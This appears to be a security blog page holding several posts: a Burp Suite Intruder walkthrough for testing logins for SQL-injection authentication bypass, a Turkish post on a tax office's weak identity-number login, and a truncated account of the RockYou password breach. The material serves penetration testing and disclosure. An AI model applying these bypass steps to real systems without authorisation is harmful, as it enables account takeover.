A login process containing SQL injection vulnerability can be bypassed by attackers. They need to manipulate username or password parameters and thus access to the application (even as administrator) without knowing the original user credentials. This is known as “Authentication Bypass via SQL-Injection”.

In this post, I want to explain how a penetration tester can use Burpsuite’s Intruder Tool to check automatically this type of vulnerability. I am also providing an authentication-bypass-list.txt file that contains various possibilities for checking sql injection.

Here are the steps that a pentester need to follow respectively:

1- Within the Proxy Tool, choose the option “send to intruder“

2- Within the Intruder tool, go to the Positions tab

“Clear” the default entries, select username and password parameter values and “Add” them to the test list. For “Attack type”, choose sniper which generates requests for all entries within the authentication-bypass-list.txt file for username and password respectively.

3- Within the Intruder tool, go to the Payloads tab

As “payload set”, choose “runtime file” and by “select file”, choose authentication-bypass-list.txt file.

4- Within the Intruder tool, go to the Options tab

The returned HTTP responses need to be analyzed to check if the attack was successful or certain error messages (e.g. SQL queries) are returned. Hence, by section “grep”, enable “search responses for these expressions”. “Add” to the list certain keywords which your application returns after successful login. As an example, my demo application returns an “YOU ARE AUTHENTICATED” message.

5- Start the Attack

Now you can start the attack by clicking Intruder->”Start Attack” on the top menu.

6- Analyze the HTTP Responses

In the final step, you need to check the results to find out if an authentication bypass was possible. You should firstly check if any match expression which you added in the Options tab for successful login was returned in the responses. Additionally, HTTP Responses with status code 302 and 200 are interesting and need to be analyzed futher. HTTP Responses with the status code 500 can contain critical error messages containing even SQL queries. You can use such error messages to execute a customized authentication bypass attack as well.

Final Words

I have created the authentication-bypass-list.txt file based on SQL-Injection Cheat Sheet of Ferruh Mavituna and Firefox Add-on “SQL Injection”. I did extend and enhance the list which contains currently 46 entries. For your contribution to the list, please contact me via tatli(at)architectingsecurity.com or @eitatli.

Bu yazımda mahremiyet ihlallerine konusuna devam etmek istiyorum.

Bu seferki ihlali gerçekleştiren Maliye Bakanlığına bağlı Gelir İdaresi Başkanlığı. Bu devlet kurumu gerçekleştirdiği bir online uygulama ile kira geliri beyan işlemini İnternet ortamına taşımışlar. Hizmet güzel ancak uygulamaya girme işlemi hiç güvenli değil. Aşağıdaki resimde görüldüğü üzere uygulamaya girmek ve kişisel bilgilere erişmek için sadece T.C. kimlik numarası ve Nüfus Cüzdan Seri Nosu gerekmektedir. Ancak bu tip kişisel bilgilere ulaşmak, İnternet ortamında yapacağınız ufak çaplı aramalarla mümkün olduğunu biliyoruz.

Bu uygulama sayesinde birçok kişinin kirada olan ev bilgilerine ulaşmak ve onlar adına kira beyanında bulunmak mümkün. Bir başkası tarafından kendisi adına yanlış kira beyanında bulunulduğu zaman ilgili kişinin bunu yetkililere nasıl anlatacağı, ispat edeceği ayrı bir konu.

Asıl burada merak ettiğim bütün devlet kurumlarına ait e-hizmetlere erişimler turkiye.gov.tr üzerinden e-devlet şifresi kullanarak yapılması hedeflenirken niçin birtakım devlet kuruluşlarının bu uygulamanın dışına rahatça çıkabilmeleri ve de bunu denetleyen, düzelten kimsenin olmaması. Kaldı ki Maliye Bakanlığı e-Yolluk ve e-Bordro uygulamaları ile zaten turkiye.gov.tr platformunda yer alıyor.

In December 2009, a critical data breach in the Internet has been experienced. Around 32 million user passwords of rockyou.com web portal were stolen by a hacker which had used SQL injection for his attack. He got all passwords and made them anonymously (i.e. without usernames) available in the Internet to download.

Security experts started analyzing the passwords and Imperva released a study regarding the security level of the passwords. They have come up with the following results:
Read the rest of this entry »